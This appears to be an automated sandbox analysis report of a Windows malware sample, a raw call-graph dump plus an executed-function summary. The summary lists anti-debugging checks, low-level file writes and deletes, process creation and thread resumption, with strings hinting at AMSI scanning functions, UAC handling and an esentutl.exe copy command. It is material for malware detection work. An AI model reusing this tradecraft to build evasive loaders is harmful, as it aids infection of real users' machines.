2dd8b99 37231->37235 37238 2dd998c 37232->37238 37240 2dd9c63 37233->37240 37248 2dda142 37234->37248 37241 2dd8bb9 37235->37241 37242 2dd8ba2 37235->37242 37251 2dd7fdc 37236->37251 37252 2dd683b 37237->37252 37244 2dce358 11 API calls 37238->37244 37250 2dd6a99 37239->37250 37245 2db4860 11 API calls 37240->37245 37243 2db4860 11 API calls 37241->37243 38346 2dc8730 17 API calls 37242->38346 37257 2dd8bda 37243->37257 37247 2dd99a1 37244->37247 37255 2dd9c84 37245->37255 37249 2db4530 11 API calls 37247->37249 37256 2dc89d0 20 API calls 37248->37256 37253 2dd99b1 37249->37253 37258 2dc89d0 20 API calls 37250->37258 37259 2dc89d0 20 API calls 37251->37259 37260 2dc89d0 20 API calls 37252->37260 37254 2db4860 11 API calls 37253->37254 37269 2dd99d2 37254->37269 37263 2db47ec 11 API calls 37255->37263 37270 2dda175 37256->37270 37264 2db47ec 11 API calls 37257->37264 37262 2dd6abd 37258->37262 37265 2dd8000 37259->37265 37261 2dd685f 37260->37261 37266 2db4860 11 API calls 37261->37266 37267 2db4860 11 API calls 37262->37267 37272 2dd9cbb 37263->37272 37274 2dd8c11 37264->37274 37268 2db4860 11 API calls 37265->37268 37276 2dd6880 37266->37276 37277 2dd6ade 37267->37277 37275 2dd8021 37268->37275 37271 2db47ec 11 API calls 37269->37271 37273 2dc89d0 20 API calls 37270->37273 37287 2dd9a09 37271->37287 37279 2dc89d0 20 API calls 37272->37279 37278 2dda1a8 37273->37278 37281 2dc89d0 20 API calls 37274->37281 37282 2db47ec 11 API calls 37275->37282 37283 2db47ec 11 API calls 37276->37283 37284 2db47ec 11 API calls 37277->37284 37280 2db4860 11 API calls 37278->37280 37285 2dd9cdf 37279->37285 37293 2dda1c9 37280->37293 37286 2dd8c35 37281->37286 37294 2dd8058 37282->37294 37295 2dd68b7 37283->37295 37297 2dd6b15 37284->37297 37288 2db49f8 11 API calls 37285->37288 37289 2db4860 11 API calls 37286->37289 37291 2dc89d0 20 API calls 37287->37291 37290 2dd9ce9 37288->37290 37299 2dd8c56 37289->37299 37932 2dc8d70 37290->37932 37296 2dd9a2d 37291->37296 37298 2db47ec 11 API calls 37293->37298 37302 2dc89d0 20 API calls 37294->37302 37303 2dc89d0 20 API calls 37295->37303 37300 2db4860 11 API calls 37296->37300 37301 2dc89d0 20 API calls 37297->37301 37312 2dda200 37298->37312 37305 2db47ec 11 API calls 37299->37305 37311 2dd9a4e 37300->37311 37304 2dd6b39 37301->37304 37306 2dd807c 37302->37306 37307 2dd68db 37303->37307 37308 2db4860 11 API calls 37304->37308 37315 2dd8c8d 37305->37315 37309 2db4860 11 API calls 37306->37309 37310 2db4860 11 API calls 37307->37310 37316 2dd6b5a 37308->37316 37318 2dd809d 37309->37318 37324 2dd68fc 37310->37324 37313 2db47ec 11 API calls 37311->37313 37314 2dc89d0 20 API calls 37312->37314 37325 2dd9a85 37313->37325 37317 2dda224 37314->37317 37320 2dc89d0 20 API calls 37315->37320 37322 2db47ec 11 API calls 37316->37322 37319 2db4860 11 API calls 37317->37319 37321 2db47ec 11 API calls 37318->37321 37328 2dda245 37319->37328 37323 2dd8cb1 37320->37323 37329 2dd80d4 37321->37329 37331 2dd6b91 37322->37331 37326 2db4860 11 API calls 37323->37326 37330 2dcdc8c 17 API calls 37324->37330 37327 2dc89d0 20 API calls 37325->37327 37332 2dd8cd2 37326->37332 37342 2dd9aa9 37327->37342 37333 2db47ec 11 API calls 37328->37333 37334 2dc89d0 20 API calls 37329->37334 37330->37131 37335 2dc89d0 20 API calls 37331->37335 37337 2db47ec 11 API calls 37332->37337 37341 2dda27c 37333->37341 37338 2dd80f8 37334->37338 37336 2dd6bb5 37335->37336 37339 2db4860 11 API calls 37336->37339 37345 2dd8d09 37337->37345 38344 2dcb118 39 API calls 37338->38344 37346 2dd6bd6 37339->37346 37344 2dc89d0 20 API calls 37341->37344 37343 2dcdc8c 17 API calls 37342->37343 37343->37115 37351 2dda2a0 37344->37351 37348 2dc89d0 20 API calls 37345->37348 37349 2db47ec 11 API calls 37346->37349 37347 2dd8109 37350 2dd8d2d ResumeThread 37348->37350 37354 2dd6c0d 37349->37354 37352 2db4860 11 API calls 37350->37352 37353 2dc89d0 20 API calls 37351->37353 37357 2dd8d59 37352->37357 37355 2dda2d3 37353->37355 37358 2dc89d0 20 API calls 37354->37358 37356 2db4860 11 API calls 37355->37356 37362 2dda2f4 37356->37362 37359 2db47ec 11 API calls 37357->37359 37360 2dd6c31 37358->37360 37364 2dd8d90 37359->37364 37361 2db4860 11 API calls 37360->37361 37365 2dd6c52 37361->37365 37363 2db47ec 11 API calls 37362->37363 37369 2dda32b 37363->37369 37366 2dc89d0 20 API calls 37364->37366 37367 2db47ec 11 API calls 37365->37367 37368 2dd8db4 37366->37368 37372 2dd6c89 37367->37372 37370 2db4860 11 API calls 37368->37370 37371 2dc89d0 20 API calls 37369->37371 37375 2dd8dd5 37370->37375 37373 2dda34f 37371->37373 37376 2dc89d0 20 API calls 37372->37376 37374 2db4860 11 API calls 37373->37374 37379 2dda370 37374->37379 37378 2db47ec 11 API calls 37375->37378 37377 2dd6cad 37376->37377 37380 2db4860 11 API calls 37377->37380 37382 2dd8e0c 37378->37382 37381 2db47ec 11 API calls 37379->37381 37384 2dd6ced 37380->37384 37386 2dda3a7 37381->37386 37383 2dc89d0 20 API calls 37382->37383 37385 2dd8e30 37383->37385 37388 2db47ec 11 API calls 37384->37388 37387 2db4860 11 API calls 37385->37387 37389 2dc89d0 20 API calls 37386->37389 37392 2dd8e51 37387->37392 37393 2dd6d24 37388->37393 37390 2dda3cb 37389->37390 37391 2db4860 11 API calls 37390->37391 37397 2dda3ec 37391->37397 37394 2db47ec 11 API calls 37392->37394 37395 2dc89d0 20 API calls 37393->37395 37398 2dd8e88 37394->37398 37396 2dd6d48 37395->37396 37400 2db4860 11 API calls 37396->37400 37399 2db47ec 11 API calls 37397->37399 37401 2dc89d0 20 API calls 37398->37401 37403 2dda423 37399->37403 37405 2dd6d77 37400->37405 37402 2dd8eac CloseHandle 37401->37402 37404 2db4860 11 API calls 37402->37404 37406 2dc89d0 20 API calls 37403->37406 37409 2dd8ed8 37404->37409 38333 2db7990 11 API calls 37405->38333 37412 2dda447 37406->37412 37408 2dd6da1 37410 2db47ec 11 API calls 37408->37410 37413 2db47ec 11 API calls 37409->37413 37411 2dd6db7 37410->37411 37415 2db4860 11 API calls 37411->37415 37414 2dc89d0 20 API calls 37412->37414 37416 2dd8f0f 37413->37416 37418 2dda47a 37414->37418 37420 2dd6de8 37415->37420 37417 2dc89d0 20 API calls 37416->37417 37419 2dd8f33 37417->37419 37421 2dc89d0 20 API calls 37418->37421 37422 2db4860 11 API calls 37419->37422 37423 2db47ec 11 API calls 37420->37423 37424 2dda4ad 37421->37424 37425 2dd8f54 37422->37425 37426 2dd6e1f 37423->37426 37427 2dc89d0 20 API calls 37424->37427 37428 2db47ec 11 API calls 37425->37428 37429 2dc89d0 20 API calls 37426->37429 37432 2dda4e0 37427->37432 37433 2dd8f8b 37428->37433 37430 2dd6e43 37429->37430 37431 2db4860 11 API calls 37430->37431 37437 2dd6e64 37431->37437 37434 2dc89d0 20 API calls 37432->37434 37435 2dc89d0 20 API calls 37433->37435 37438 2dda513 37434->37438 37436 2dd8faf 37435->37436 37439 2db4860 11 API calls 37436->37439 37441 2db47ec 11 API calls 37437->37441 37440 2db4860 11 API calls 37438->37440 37443 2dd8fd0 37439->37443 37442 2dda534 37440->37442 37444 2dd6e9b 37441->37444 37445 2db47ec 11 API calls 37442->37445 37446 2db47ec 11 API calls 37443->37446 37447 2dc89d0 20 API calls 37444->37447 37449 2dda56b 37445->37449 37450 2dd9007 37446->37450 37448 2dd6ebf 37447->37448 38334 2db7990 11 API calls 37448->38334 37453 2dc89d0 20 API calls 37449->37453 37454 2dc89d0 20 API calls 37450->37454 37452 2dd6ed5 37455 2db47ec 11 API calls 37452->37455 37456 2dda58f 37453->37456 37457 2dd902b 37454->37457 37458 2dd6eeb 37455->37458 37459 2db4860 11 API calls 37456->37459 37460 2db4860 11 API calls 37457->37460 37461 2db4860 11 API calls 37458->37461 37462 2dda5b0 37459->37462 37463 2dd904c 37460->37463 37466 2dd6f1c 37461->37466 37464 2db47ec 11 API calls 37462->37464 37465 2db47ec 11 API calls 37463->37465 37468 2dda5e7 37464->37468 37469 2dd9083 37465->37469 37467 2db47ec 11 API calls 37466->37467 37472 2dd6f53 37467->37472 37470 2dc89d0 20 API calls 37468->37470 37471 2dc89d0 20 API calls 37469->37471 37477 2dda60b 37470->37477 37473 2dd90a7 37471->37473 37475 2dc89d0 20 API calls 37472->37475 37474 2db4860 11 API calls 37473->37474 37479 2dd90c8 37474->37479 37476 2dd6f77 37475->37476 37478 2db4860 11 API calls 37476->37478 37480 2dc89d0 20 API calls 37477->37480 37482 2dd6f98 37478->37482 37481 2db47ec 11 API calls 37479->37481 37483 2dda63e 37480->37483 37486 2dd90ff 37481->37486 37484 2db47ec 11 API calls 37482->37484 37485 2dc89d0 20 API calls 37483->37485 37488 2dd6fcf 37484->37488 37490 2dda671 37485->37490 37487 2dc89d0 20 API calls 37486->37487 37489 2dd9123 37487->37489 37492 2dc89d0 20 API calls 37488->37492 37491 2db4860 11 API calls 37489->37491 37494 2dc89d0 20 API calls 37490->37494 37496 2dd9144 37491->37496 37493 2dd6ff3 37492->37493 37498 2dda6a4 37494->37498 37497 2db47ec 11 API calls 37496->37497 37501 2dd917b 37497->37501 37500 2dc89d0 20 API calls 37498->37500 37502 2dda6d7 37500->37502 37506 2dc89d0 20 API calls 37502->37506 37508 2dda70a 37506->37508 37509 2db4860 11 API calls 37508->37509 37511 2dda72b 37509->37511 37513 2db47ec 11 API calls 37511->37513 37515 2dda762 37513->37515 37518 2dc89d0 20 API calls 37515->37518 37519 2dda786 37518->37519 37520 2db4860 11 API calls 37519->37520 37525 2dda7a7 37520->37525 37528 2db47ec 11 API calls 37525->37528 37533 2dda7de 37528->37533 37536 2dc89d0 20 API calls 37533->37536 37538 2dda802 37536->37538 37539 2db4860 11 API calls 37538->37539 37541 2dda823 37539->37541 37543 2db47ec 11 API calls 37541->37543 37546 2dda85a 37543->37546 37548 2dc89d0 20 API calls 37546->37548 37695 2dcf0b9 37694->37695 37696 2dcf0e5 37695->37696 38347 2db46c4 11 API calls 37695->38347 38348 2db4530 11 API calls 37695->38348 37698 2db44dc 11 API calls 37696->37698 37699 2dcf0fa 37698->37699 37699->36159 37702 2db4bcc 11 API calls 37701->37702 37703 2dce370 37702->37703 37704 2dce391 37703->37704 37705 2db49f8 11 API calls 37703->37705 37704->36193 37705->37703 37707 2dcdca2 37706->37707 38349 2db4f20 37707->38349 37709 2dcdcaa 37710 2dcdcca RtlDosPathNameToNtPathName_U 37709->37710 38353 2dcdbdc 37710->38353 37712 2dcdce6 NtCreateFile 37713 2dcdd11 37712->37713 37714 2db49f8 11 API calls 37713->37714 37715 2dcdd23 NtWriteFile NtClose 37714->37715 37716 2dcdd4d 37715->37716 38354 2db4c60 37716->38354 37719 2db44dc 11 API calls 37720 2dcdd5d Sleep 37719->37720 37720->36197 37722 2dce681 37721->37722 37722->37722 37723 2db4860 11 API calls 37722->37723 37724 2dce6ca 37723->37724 37725 2db47ec 11 API calls 37724->37725 37726 2dce6ef 37725->37726 37727 2dc89d0 20 API calls 37726->37727 37728 2dce70a 37727->37728 37729 2db4860 11 API calls 37728->37729 37730 2dce723 37729->37730 37731 2db47ec 11 API calls 37730->37731 37732 2dce748 37731->37732 37733 2dc89d0 20 API calls 37732->37733 37734 2dce763 37733->37734 37735 2db4860 11 API calls 37734->37735 37736 2dce77c 37735->37736 37737 2db47ec 11 API calls 37736->37737 37738 2dce7a1 37737->37738 37739 2dc89d0 20 API calls 37738->37739 37740 2dce7bc 37739->37740 37741 2db4860 11 API calls 37740->37741 37742 2dce7ee 37741->37742 37743 2dc89d0 20 API calls 37742->37743 37744 2dce838 37743->37744 37745 2db4860 11 API calls 37744->37745 37746 2dce86f 37745->37746 37747 2db47ec 11 API calls 37746->37747 37748 2dce894 37747->37748 37749 2dc89d0 20 API calls 37748->37749 37750 2dce8af 37749->37750 37751 2db4860 11 API calls 37750->37751 37752 2dce8c8 37751->37752 37753 2db47ec 11 API calls 37752->37753 37754 2dce8ed 37753->37754 37755 2dc89d0 20 API calls 37754->37755 37756 2dce908 37755->37756 37757 2db4860 11 API calls 37756->37757 37758 2dce921 37757->37758 37759 2db47ec 11 API calls 37758->37759 37760 2dce946 37759->37760 37761 2dc89d0 20 API calls 37760->37761 37762 2dce961 37761->37762 38357 2db7f2c 37762->38357 37764 2dce985 38361 2dc8788 37764->38361 37767 2db4860 11 API calls 37768 2dcea0a 37767->37768 37769 2db47ec 11 API calls 37768->37769 37770 2dcea3b 37769->37770 37771 2dc89d0 20 API calls 37770->37771 37772 2dcea5f 37771->37772 37773 2db4860 11 API calls 37772->37773 37774 2dcea7b 37773->37774 37775 2db47ec 11 API calls 37774->37775 37776 2dceaac 37775->37776 37777 2dc89d0 20 API calls 37776->37777 37778 2dcead0 37777->37778 37779 2db4860 11 API calls 37778->37779 37780 2dceaec 37779->37780 37781 2db47ec 11 API calls 37780->37781 37782 2dceb1d 37781->37782 37783 2dc89d0 20 API calls 37782->37783 37784 2dceb41 37783->37784 37785 2db4860 11 API calls 37784->37785 37786 2dceb5d 37785->37786 37787 2db47ec 11 API calls 37786->37787 37788 2dceb7b 37787->37788 37789 2dc894c 21 API calls 37788->37789 37790 2dceb90 37789->37790 37791 2db4860 11 API calls 37790->37791 37792 2dcebac 37791->37792 37793 2db47ec 11 API calls 37792->37793 37794 2dcebca 37793->37794 37795 2dc894c 21 API calls 37794->37795 37796 2dcebdf 37795->37796 37797 2db4860 11 API calls 37796->37797 37798 2dcebfb 37797->37798 37799 2db47ec 11 API calls 37798->37799 37800 2dcec19 37799->37800 37801 2dc894c 21 API calls 37800->37801 37802 2dcec2e 37801->37802 37803 2db4860 11 API calls 37802->37803 37804 2dcec4a 37803->37804 37805 2db47ec 11 API calls 37804->37805 37806 2dcec68 37805->37806 37807 2dc894c 21 API calls 37806->37807 37808 2dcec7d 37807->37808 37809 2dcec87 37808->37809 37810 2dceee2 37808->37810 37811 2db4860 11 API calls 37809->37811 37812 2db4500 11 API calls 37810->37812 37815 2dceca3 37811->37815 37813 2dceeff 37812->37813 37814 2db4c60 SysFreeString 37813->37814 37816 2dcef0a 37814->37816 37818 2db47ec 11 API calls 37815->37818 37817 2db4500 11 API calls 37816->37817 37819 2dcef1a 37817->37819 37824 2dcecd4 37818->37824 37820 2db4c60 SysFreeString 37819->37820 37821 2dcef22 37820->37821 37822 2db4500 11 API calls 37821->37822 37823 2dcef2f 37822->37823 37823->36217 37825 2dc89d0 20 API calls 37824->37825 37826 2dcecf8 37825->37826 37827 2db4860 11 API calls 37826->37827 37828 2dced14 37827->37828 37829 2db47ec 11 API calls 37828->37829 37830 2dced45 37829->37830 37831 2dc89d0 20 API calls 37830->37831 37832 2dced69 WaitForSingleObject CloseHandle CloseHandle 37831->37832 37833 2db4860 11 API calls 37832->37833 37834 2dceda0 37833->37834 37835 2db47ec 11 API calls 37834->37835 37836 2dcedbe 37835->37836 37837 2dc894c 21 API calls 37836->37837 37838 2dcedd3 37837->37838 37839 2db4860 11 API calls 37838->37839 37840 2dcedef 37839->37840 37841 2db47ec 11 API calls 37840->37841 37842 2dcee0d 37841->37842 37843 2dc894c 21 API calls 37842->37843 37844 2dcee22 37843->37844 37845 2db4860 11 API calls 37844->37845 37846 2dcee3e 37845->37846 37847 2db47ec 11 API calls 37846->37847 37848 2dcee5c 37847->37848 37849 2dc894c 21 API calls 37848->37849 37850 2dcee71 37849->37850 37851 2db4860 11 API calls 37850->37851 37852 2dcee8d 37851->37852 37853 2db47ec 11 API calls 37852->37853 37854 2dceeab 37853->37854 37855 2dc894c 21 API calls 37854->37855 37856 2dceec0 37855->37856 37857 2dc894c 21 API calls 37856->37857 37858 2dceed1 37857->37858 37859 2dc894c 21 API calls 37858->37859 37859->37810 37861 2db49a4 37860->37861 37861->36239 37863 2dc89bb 37862->37863 37864 2dc8973 GetProcAddress 37862->37864 37863->36299 37865 2dc898d 37864->37865 37866 2dc89b0 FreeLibrary 37864->37866 37867 2dc7d78 18 API calls 37865->37867 37866->37863 37868 2dc89a5 37867->37868 37868->37866 37870 2db4f20 SysAllocStringLen 37869->37870 37871 2dcdc16 RtlI 37870->37871 37873 2dcdc3a 37871->37873 37874 2dcdc41 RtlDosPathNameToNtPathName_U 37873->37874 38385 2dcdbdc 37874->38385 37876 2dcdc5d NtDeleteFile 37877 2dcdc75 37876->37877 37878 2db4c60 SysFreeString 37877->37878 37879 2dcdc7d 37878->37879 37879->36537 37881 2dce3ba 37880->37881 37882 2dce45c 37881->37882 38386 2db46c4 11 API calls 37881->38386 38387 2db4530 11 API calls 37881->38387 37883 2db4bcc 11 API calls 37882->37883 37884 2dce471 37883->37884 37885 2db4530 11 API calls 37884->37885 37887 2dce47c 37885->37887 37889 2db44dc 11 API calls 37887->37889 37890 2dce491 37889->37890 37891 2db4500 11 API calls 37890->37891 37892 2dce49e 37891->37892 37892->36618 37895 2db7adc 37893->37895 37894 2db7afd 37897 2dcf16c 37894->37897 37895->37894 38388 2db7660 42 API calls 37895->38388 37898 2dcf189 37897->37898 37899 2dcf1e7 37898->37899 38389 2db46c4 11 API calls 37898->38389 38390 2db4530 11 API calls 37898->38390 37901 2db44dc 11 API calls 37899->37901 37902 2dcf1fc 37901->37902 37904 2db44dc 11 API calls 37902->37904 37905 2dcf204 37904->37905 37905->36636 37907 2db4530 11 API calls 37906->37907 37908 2dcf11c 37907->37908 37909 2dcf163 37908->37909 37910 2db49f8 11 API calls 37908->37910 37909->36666 37910->37908 37912 2db49a0 37911->37912 37913 2db7e66 GetFileAttributesA 37912->37913 37914 2db7e71 37913->37914 37914->36703 37914->36712 37916 2db4530 11 API calls 37915->37916 37917 2dc85df 37916->37917 37918 2db4860 11 API calls 37917->37918 37919 2dc85fe 37918->37919 37920 2dc81cc 17 API calls 37919->37920 37921 2dc8611 37920->37921 37922 2dc8274 15 API calls 37921->37922 37923 2dc8617 WinExec 37922->37923 37924 2dc8639 37923->37924 37925 2db44dc 11 API calls 37924->37925 37926 2dc8641 37925->37926 37926->37005 37933 2dc8d78 37932->37933 37934 2db4860 11 API calls 37933->37934 37935 2dc8dbb 37934->37935 37936 2db47ec 11 API calls 37935->37936 37937 2dc8de0 37936->37937 37938 2dc89d0 20 API calls 37937->37938 37939 2dc8dfb 37938->37939 37940 2db4860 11 API calls 37939->37940 37941 2dc8e14 37940->37941 37942 2db47ec 11 API calls 37941->37942 37943 2dc8e39 37942->37943 37944 2dc89d0 20 API calls 37943->37944 37945 2dc8e54 37944->37945 37946 2dca8b7 37945->37946 37947 2db4860 11 API calls 37945->37947 37948 2db4500 11 API calls 37946->37948 37952 2dc8e85 37947->37952 37949 2dca8d4 37948->37949 37950 2db4500 11 API calls 37949->37950 37951 2dca8e4 37950->37951 37953 2db4c60 SysFreeString 37951->37953 37954 2db47ec 11 API calls 37952->37954 37955 2dca8ef 37953->37955 37960 2dc8eaa 37954->37960 37956 2db4500 11 API calls 37955->37956 37957 2dca8ff 37956->37957 37958 2db44dc 11 API calls 37957->37958 37959 2dca907 37958->37959 37961 2db4500 11 API calls 37959->37961 37963 2dc89d0 20 API calls 37960->37963 37962 2dca914 37961->37962 37964 2db4500 11 API calls 37962->37964 37965 2dc8ec5 37963->37965 37966 2dca921 37964->37966 37967 2db4860 11 API calls 37965->37967 37966->36925 37968 2dc8ede 37967->37968 37969 2db47ec 11 API calls 37968->37969 37970 2dc8f03 37969->37970 37971 2dc89d0 20 API calls 37970->37971 37972 2dc8f1e 37971->37972 37972->37946 37973 2db4860 11 API calls 37972->37973 37974 2dc8f66 37973->37974 37975 2db47ec 11 API calls 37974->37975 37976 2dc8f8b 37975->37976 37977 2dc89d0 20 API calls 37976->37977 37978 2dc8fa6 37977->37978 37979 2db4860 11 API calls 37978->37979 37980 2dc8fbf 37979->37980 37981 2db47ec 11 API calls 37980->37981 37982 2dc8fe4 37981->37982 37983 2dc89d0 20 API calls 37982->37983 37984 2dc8fff 37983->37984 37985 2db4860 11 API calls 37984->37985 37986 2dc9044 37985->37986 37987 2db47ec 11 API calls 37986->37987 37988 2dc9069 37987->37988 37989 2dc89d0 20 API calls 37988->37989 37990 2dc9084 37989->37990 37991 2db4860 11 API calls 37990->37991 37992 2dc909d 37991->37992 37993 2db47ec 11 API calls 37992->37993 37994 2dc90c5 37993->37994 37995 2dc89d0 20 API calls 37994->37995 37996 2dc90e3 37995->37996 37997 2db4860 11 API calls 37996->37997 37998 2dc90ff 37997->37998 37999 2db47ec 11 API calls 37998->37999 38000 2dc9130 37999->38000 38001 2dc89d0 20 API calls 38000->38001 38002 2dc9154 38001->38002 38003 2db4860 11 API calls 38002->38003 38004 2dc9170 38003->38004 38005 2db47ec 11 API calls 38004->38005 38006 2dc91a1 38005->38006 38007 2dc89d0 20 API calls 38006->38007 38008 2dc91c5 38007->38008 38009 2db4860 11 API calls 38008->38009 38010 2dc91e1 38009->38010 38011 2db47ec 11 API calls 38010->38011 38012 2dc9212 38011->38012 38013 2dc89d0 20 API calls 38012->38013 38014 2dc9236 38013->38014 38015 2dc8788 18 API calls 38014->38015 38016 2dc9273 38015->38016 38017 2dc92e8 38016->38017 38019 2db4860 11 API calls 38016->38019 38018 2db4860 11 API calls 38017->38018 38021 2dc9293 38019->38021 38333->37408 38334->37452 38335->36910 38336->37108 38338 2db49ac 38337->38338 38339 2db49e7 38338->38339 38340 2db45a0 11 API calls 38338->38340 38343 2dc7e50 17 API calls 38339->38343 38341 2db49c3 38340->38341 38341->38339 38342 2db2c2c 11 API calls 38341->38342 38342->38339 38343->37174 38344->37347 38345->37114 38346->37241 38347->37695 38348->37695 38350 2db4f3c 38349->38350 38351 2db4f26 SysAllocStringLen 38349->38351 38350->37709 38351->38350 38352 2db4c30 38351->38352 38352->38349 38353->37712 38355 2db4c66 SysFreeString 38354->38355 38356 2db4c74 38354->38356 38355->38356 38356->37719 38358 2db7f3f 38357->38358 38373 2db4a00 38358->38373 38362 2db4530 11 API calls 38361->38362 38363 2dc87ab 38362->38363 38364 2db4860 11 API calls 38363->38364 38365 2dc87ca 38364->38365 38366 2dc81cc 17 API calls 38365->38366 38367 2dc87dd 38366->38367 38368 2dc8274 15 API calls 38367->38368 38369 2dc87e3 CreateProcessAsUserW 38368->38369 38370 2dc8827 38369->38370 38371 2db44dc 11 API calls 38370->38371 38372 2dc882f 38371->38372 38372->37767 38374 2db4a32 38373->38374 38376 2db4a05 38373->38376 38375 2db44dc 11 API calls 38374->38375 38377 2db4a28 38375->38377 38376->38374 38378 2db4a19 38376->38378 38377->37764 38380 2db45cc 38378->38380 38381 2db45a0 11 API calls 38380->38381 38382 2db45dc 38381->38382 38383 2db44dc 11 API calls 38382->38383 38384 2db45f4 38383->38384 38384->38377 38385->37876 38386->37881 38387->37881 38388->37894 38389->37898 38390->37898

                                                                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                                                                  Function 02DCF7C8 Relevance: 227.8, APIs: 8, Strings: 117, Instructions: 9071COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • InetIsOffline.URL(00000000,00000000,02DDB784,?,?,?,00000000,00000000), ref: 02DCF801
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC89D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02E3738C,Function_0000662C,00000004,02E3739C,02E3738C,05F5E103,00000040,02E373A0,74B10000,00000000,00000000), ref: 02DC8AAA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCF6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02DCFAEB,UacInitialize,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,ScanBuffer,02E37380,02DDB7B8,ScanString,02E37380,02DDB7B8,Initialize), ref: 02DCF6EE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCF6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02DCF700
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCF744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02DCF754
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCF744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02DCF766
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCF744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02DCF77D
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB7E5C: GetFileAttributesA.KERNEL32(00000000,?,02DD041F,ScanString,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,ScanString,02E37380,02DDB7B8,UacScan,02E37380,02DDB7B8,UacInitialize), ref: 02DB7E67
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DBC364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02F2B8B8,?,02DD0751,ScanBuffer,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,ScanBuffer,02E37380,02DDB7B8,OpenSession), ref: 02DBC37B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DCDE40), ref: 02DCDDAB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02DCDE40), ref: 02DCDDDB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02DCDDF0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02DCDE1C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02DCDE25
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB7E80: GetFileAttributesA.KERNEL32(00000000,?,02DD356F,ScanString,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,ScanBuffer,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,Initialize), ref: 02DB7E8B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB8048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02DD370D,OpenSession,02E37380,02DDB7B8,ScanString,02E37380,02DDB7B8,Initialize,02E37380,02DDB7B8,ScanString,02E37380,02DDB7B8), ref: 02DB8055
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                                                                                                                                                                                                                                                                                  • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y 